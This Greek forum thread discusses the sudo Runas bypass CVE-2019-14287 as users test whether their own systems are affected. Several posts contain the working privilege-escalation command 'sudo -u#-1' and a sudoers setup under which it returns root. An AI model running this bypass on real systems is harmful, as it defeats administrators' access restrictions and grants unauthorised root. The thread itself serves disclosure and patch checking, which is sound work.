Σελ. 1 από 2 12 ΤελευταίαΤελευταία
Εμφάνιση 1-15 από 25
  1. #1
    Εγγραφή
    21-09-2003
    Μηνύματα
    73.033
    Downloads
    217
    Uploads
    48
    Άρθρα
    6
    Τύπος
    VDSL2
    Ταχύτητα
    204800/20480
    ISP
    Wind
    Router
    Technicolor DGA4130
    SNR / Attn
    6(dB) / 2.8(dB)
    Path Level
    Interleaved
    Όλες οι εκδόσεις του Sudo πριν την 1.8.28, έχουν ευπάθεια στο security policy bypass, επιτρέποντας την εκτέλεση εντολών σαν root, ακόμα και αν ο λογαριασμός που χρησιμοποιείται απαγορεύει ρητά την root πρόσβαση.

    By default on most Linux distributions, the ALL keyword in RunAs specification in /etc/sudoers file, as shown in the screenshot, allows all users in the admin or sudo groups to run any command as any valid user on the system.

    However, since privilege separation is one of the fundamental security paradigms in Linux, administrators can configure a sudoers file to define which users can run what commands as to which users.

    So, even if a user has been restricted to run a specific, or any, command as root, the vulnerability could allow the user to bypass this security policy and take complete control over the system.

    "This can be used by a user with sufficient sudo privileges to run commands as root even if the Runas specification explicitly disallows root access as long as the ALL keyword is listed first in the Runas specification," the Sudo developers say.
    Η ευπάθεια με CVE-2019-14287, μπορεί να γίνει αντικείμενο εκμετάλλευσης, βάζοντας σαν userID το "-1" ή το "4294967295". Το utility που μετατρέπει το user ID σε username, χειρίζεται λανθασμένα αυτούς τους 2 αριθμούς σαν τον αριθμό 0 -με το user ID 0 να είναι πάντα ο χρήστης root.

    "Additionally, because the user ID specified via the -u option does not exist in the password database, no PAM session modules will be run."
    Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  linux-sudo-hacking.png 
Εμφανίσεις:  471 
Μέγεθος:  12,2 KB 
ID: 207674


    Πηγή : The Hacker News

  2. #2
    Εγγραφή
    01-04-2006
    Μηνύματα
    1.268
    Downloads
    6
    Uploads
    0
    Τύπος
    Cable
    Ταχύτητα
    230Mbps Down/12.7Mbps Up
    ISP
    Virgin Media
    Σε Debian αναβαθμίστηκε εχθές.

  3. #3
    Εγγραφή
    17-03-2003
    Περιοχή
    Ηράκλειο Κρήτης
    Μηνύματα
    2.277
    Downloads
    6
    Uploads
    0
    Ταχύτητα
    11050/648
    ISP
    COSMOTE
    Router
    OTE Oxygen Multigateway
    Μάλλον το δικό μου πατσαρίστηκε γρήγορα.

    Δοκιμάστε το:

    Κώδικας:
    # useradd guest
    # passwd guest
    # su guest
    
    $ sudo -u#-1 bash
    Intel i7 Skylake, Nvidia GTX1080Ti - Arch Linux/Windows 10
    Lenovo Thinkpad T470s - Ubuntu 19.04
    iMac G5 - Leaky MB capacitors

  4. #4
    Εγγραφή
    02-04-2010
    Μηνύματα
    4.572
    Downloads
    0
    Uploads
    0
    ISP
    Forthnet
    Η τρύπα του αιώνα?
    Όσο περισσότερο σου κλέβουν τη ζωή, τόσο σε ταΐζουν με έθνος και φυλή..

    Εθνικισμός και μετανάστες

    Μία τάξη, φυλετικά διαχωρισμένη

  5. #5
    Εγγραφή
    10-02-2005
    Περιοχή
    Αθήνα
    Ηλικία
    52
    Μηνύματα
    320
    Downloads
    3
    Uploads
    0
    Τύπος
    VDSL2
    Ταχύτητα
    30720/2560
    ISP
    ΟΤΕ Conn-x
    DSLAM
    ΟΤΕ - ΑΓ. ΠΑΡΑΣΚΕΥΗ
    Router
    FritzBox 7590
    SNR / Attn
    21(dB) / 7(dB)
    Δεν ξέρω,
    άλλα ένα redhat 7.4 me sudo 1.8.19p2 δεν μου έδωσε access
    Κώδικας:
    [xxx@yyy ~]$ sudo -u#-1 bash
    [sudo] password for xxx:
    Sorry, user xxx is not allowed to execute '/bin/bash' as #-1 on yyy.
    [xxx@yyy ~]$ sudo -u\#-1 bash
    [sudo] password for xxx:
    Sorry, user xxxis not allowed to execute '/bin/bash' as #-1 on yyy.
    
    [xxx@yyy ~]$ sudo -V
    Sudo version 1.8.19p2
    Sudoers policy plugin version 1.8.19p2
    Sudoers file grammar version 45
    Sudoers I/O plugin version 1.8.19p2
    
    [xxx@yyy ~]$ cat /etc/redhat-release
    Red Hat Enterprise Linux Server release 7.4 (Maipo)
    Τελευταία επεξεργασία από το μέλος papako : 15-10-19 στις 10:28.

  6. #6
    Εγγραφή
    17-03-2003
    Περιοχή
    Ηράκλειο Κρήτης
    Μηνύματα
    2.277
    Downloads
    6
    Uploads
    0
    Ταχύτητα
    11050/648
    ISP
    COSMOTE
    Router
    OTE Oxygen Multigateway
    Και σε εμένα ήταν η 1.8.27 τελικά αλλα δεν δούλευε.
    Intel i7 Skylake, Nvidia GTX1080Ti - Arch Linux/Windows 10
    Lenovo Thinkpad T470s - Ubuntu 19.04
    iMac G5 - Leaky MB capacitors

  7. #7
    Εγγραφή
    02-04-2010
    Μηνύματα
    4.572
    Downloads
    0
    Uploads
    0
    ISP
    Forthnet
    Παράθεση Αρχικό μήνυμα από Eruyome(MMXGN) Εμφάνιση μηνυμάτων
    Μάλλον το δικό μου πατσαρίστηκε γρήγορα.

    Δοκιμάστε το:

    Κώδικας:
    # useradd guest
    # passwd guest
    # su guest
    
    $ sudo -u#-1 bash
    xxx:~# useradd guest
    xxx:~# passwd guest
    Enter new UNIX password:
    Retype new UNIX password:
    passwd: password updated successfully
    xxx:~# su guest
    $ sudo -u#-1 bash
    [sudo] password for guest:
    Sorry, user guest is not allowed to execute '/bin/bash' as #-1 on xxx.
    Εντάξει είμαι?

    Sudo version 1.8.21p2
    Όσο περισσότερο σου κλέβουν τη ζωή, τόσο σε ταΐζουν με έθνος και φυλή..

    Εθνικισμός και μετανάστες

    Μία τάξη, φυλετικά διαχωρισμένη

  8. #8
    Εγγραφή
    17-03-2003
    Περιοχή
    Ηράκλειο Κρήτης
    Μηνύματα
    2.277
    Downloads
    6
    Uploads
    0
    Ταχύτητα
    11050/648
    ISP
    COSMOTE
    Router
    OTE Oxygen Multigateway
    Παράθεση Αρχικό μήνυμα από Zus Εμφάνιση μηνυμάτων
    Εντάξει είμαι?
    Ή κάτι κάνουμε λάθος ή χρειάζεται να κάνεις κάτι συγκεκριμένο στο /etc/sudoers που δεν αναφέρεται.

    Λεπτομέρεια είναι οτι έχω access sto %wheel και όχι στο %sudo. Δεν ξέρω αν έχει σημασία.
    Intel i7 Skylake, Nvidia GTX1080Ti - Arch Linux/Windows 10
    Lenovo Thinkpad T470s - Ubuntu 19.04
    iMac G5 - Leaky MB capacitors

  9. #9
    Εγγραφή
    31-12-2007
    Περιοχή
    3rd Rock from the Sun
    Ηλικία
    44
    Μηνύματα
    531
    Downloads
    1
    Uploads
    0
    Τύπος
    VDSL2
    ISP
    Nova
    Path Level
    Fastpath
    Σε Arch με 1.8.27-1 δεν δούλεψε.

    Από ότι είδα στο αρχείο sudoers δεν είχα "ενεργό" το
    Κώδικας:
    %sudo	ALL=(ALL) ALL
    οπότε για αυτό τον λόγο δεν δούλεψε.
    Τελευταία επεξεργασία από το μέλος GigaSat : 15-10-19 στις 12:30.

  10. #10
    Εγγραφή
    17-03-2003
    Περιοχή
    Ηράκλειο Κρήτης
    Μηνύματα
    2.277
    Downloads
    6
    Uploads
    0
    Ταχύτητα
    11050/648
    ISP
    COSMOTE
    Router
    OTE Oxygen Multigateway
    Οκ δούλεψε σε fedora με 1.8.27

    Θέλει edit το sudoers

    Κώδικας:
    # visudo
    Κώδικας:
    # Προσθέστε αυτή τη γραμμή
    guest myhost=(ALL,!root) /usr/bin/id
    Μετά:

    Κώδικας:
    # as guest
    $ sudo id 
    
    Sorry, user guest is not allowed to execute '/usr/bin/id' as root on myhost.
    
    $ sudo -u#-1 id
    uid=0(root) gid=1001(guest)...
    Οπότε θέλει να έχεις πειράξει ήδη το sudoers και να χεις βάλει μέσα τον χρήστη/group/whatevs.
    Τελευταία επεξεργασία από το μέλος Eruyome(MMXGN) : 15-10-19 στις 12:44.
    Intel i7 Skylake, Nvidia GTX1080Ti - Arch Linux/Windows 10
    Lenovo Thinkpad T470s - Ubuntu 19.04
    iMac G5 - Leaky MB capacitors

  11. #11
    Εγγραφή
    02-11-2003
    Περιοχή
    40-65N 22-9E
    Ηλικία
    44
    Μηνύματα
    56.075
    Downloads
    64
    Uploads
    73
    Τύπος
    VDSL2
    Ταχύτητα
    51200/5120
    ISP
    ΟΤΕ Conn-x
    DSLAM
    ΟΤΕ - ΒΑΡΝΑΣ
    Router
    ZTE Speedport Entry 2i
    Path Level
    Fastpath
    Μία σαβούρα για άσχετους ουμπουντάδες ήταν ανέκαθεν το sudo.

    Η σοβαρή εντολή ανέκαθεν ήταν η su -.
    Επιτέλους το ελάχιστο δυνατό, ευέλικτο, και ψηφιακό κράτος. Με διαρκή αξιολόγηση.

  12. #12
    Εγγραφή
    31-07-2010
    Περιοχή
    Thessaloniki
    Μηνύματα
    235
    Downloads
    1
    Uploads
    0
    Ταχύτητα
    24576/1024
    ISP
    Nova
    Path Level
    Interleaved
    Παράθεση Αρχικό μήνυμα από WAntilles Εμφάνιση μηνυμάτων
    Μία σαβούρα για άσχετους ουμπουντάδες ήταν ανέκαθεν το sudo.

    Η σοβαρή εντολή ανέκαθεν ήταν η su -.
    Συμφωνώ, σε gentoo ποτέ δεν το χρειάστηκα, μέχρι πρότινος όμως που έπρεπε να εκτελώ scripts ως απλός χρήστης χωρίς να είμαι αναγκασμένος να έχω interaction για password. Αναγκαίο κακό επομένως, για κάποιες περιπτώσεις.

    Βέβαια έχω απομονώσει συγκεκριμένες εντολές που επιτρέπεται να εκτελεί ο απλός χρήστης, οπότε είναι κάπως καλύτερα απ'το default
    "%sudo ALL=(ALL) ALL".

  13. #13
    Εγγραφή
    14-11-2003
    Περιοχή
    At Milliways, the Restaurant at the End of the Universe
    Ηλικία
    39
    Μηνύματα
    2.829
    Downloads
    96
    Uploads
    0
    Τύπος
    VDSL2
    Ταχύτητα
    50000/5000
    ISP
    ΟΤΕ Conn-x
    Router
    OpenWRT (WNDR3700v2)
    Παράθεση Αρχικό μήνυμα από WAntilles Εμφάνιση μηνυμάτων
    Μία σαβούρα για άσχετους ουμπουντάδες ήταν ανέκαθεν το sudo.

    Η σοβαρή εντολή ανέκαθεν ήταν η su -.
    Ναι, για αυτό και έχουν sudo μέχρι και στο amazon linux. Τι να ξέρει και η αμαζον....
    Να φανταστώ και στα windows σου με τον admin κάνεις login?
    Τελευταία επεξεργασία από το μέλος xhaos : 15-10-19 στις 16:42.
    See first, think later, then test. But always see first. Otherwise you will only see what you were expecting. Most scientists forget that. - Douglas Adams
    There's no right, there's no wrong, there's only popular opinion. - Jeffrey Goines (12 Monkeys)


  14. #14
    Εγγραφή
    24-10-2004
    Μηνύματα
    14.763
    Downloads
    43
    Uploads
    0
    ISP
    V
    Παράθεση Αρχικό μήνυμα από xhaos Εμφάνιση μηνυμάτων
    Ναι, για αυτό και έχουν sudo μέχρι και στο amazon linux. Τι να ξέρει και η αμαζον....
    Να φανταστώ και στα windows σου με τον admin κάνεις login?
    καλά ότι το έχει και η amazon ή η κάθε amazon τι να λέει;
    Αυτοί ειδικά έχουν πρώτο μέλημα ένα "εύκολο" λειτουργικό, άρα χωρίς κωδικούς και βλακείες.

  15. #15
    Εγγραφή
    28-02-2006
    Μηνύματα
    646
    Downloads
    0
    Uploads
    0
    DSLAM
    ΟΤΕ - Ν. ΦΙΛΑΔΕΛΦΕΙΑ
    Παράθεση Αρχικό μήνυμα από Gentoo Εμφάνιση μηνυμάτων
    Συμφωνώ, σε gentoo ποτέ δεν το χρειάστηκα, μέχρι πρότινος όμως που έπρεπε να εκτελώ scripts ως απλός χρήστης χωρίς να είμαι αναγκασμένος να έχω interaction για password. Αναγκαίο κακό επομένως, για κάποιες περιπτώσεις.
    Βασικά αυτό.

    Και εγώ για interactive χρήση δεν το χρησιμοποιώ σχεδόν ποτέ, αλλά για αυτοματοποιημένη εκτέλεση scripts ως root, είναι σχεδόν μονόδρομος...
    Επιτέλους ADSL! Αν και χρειάστηκε να περιμένω περισσότερο από ένα μήνα για τις πόρτες του ακατανόμαστου οργανισμού.

Σελ. 1 από 2 12 ΤελευταίαΤελευταία

Tags για αυτό το Θέμα

Bookmarks

Bookmarks

Δικαιώματα - Επιλογές

  • Δεν μπορείτε να δημοσιεύσετε νέα θέματα
  • Δεν μπορείτε να δημοσιεύσετε νέα μηνύματα
  • Δεν μπορείτε να αναρτήσετε συνημμένα
  • Δεν μπορείτε να επεξεργαστείτε τα μηνύματα σας
  •  
  • Τα BB code είναι σε λειτουργία
  • Τα Smilies είναι σε λειτουργία
  • Το [IMG] είναι σε λειτουργία
  • Το [VIDEO] είναι σε λειτουργία
  • Το HTML είναι εκτός λειτουργίας